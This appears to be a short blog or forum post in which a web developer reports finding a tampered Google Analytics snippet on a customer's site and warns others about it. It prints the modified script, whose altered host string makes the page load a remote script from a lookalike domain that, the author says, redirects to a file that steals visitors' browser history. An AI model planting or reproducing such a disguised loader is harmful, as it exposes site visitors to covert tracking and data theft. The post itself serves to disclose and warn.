I found this on a customer site (for example) customersite.com. Looks like Google Analytics tracking code right?
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://customersite.com" : "http://www.customersite.com");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
var test = unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E");
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker("UA-xxxxxx-x");
pageTracker._trackPageview();
} catch(err) {}</script>
Somehow my customer had been tricked into changing:
"https://" : "http://"
to:
"https://customersite.com" : "http://www.customersite.com"
This makes the JavaScript called from http://www.customersite.comgoogle-analytics.com which then redirects to dxwebhost.com/l.js for the JavaScript. It looks like JavaScript file then uses a CSS vulnerability to look-up the user's browser history, and asynchronously send it off to the third party site.
So if you happen to be looking at your network traffic and notice your browser history is being sent off to a strange site, check out the Google Analytics tracking code.
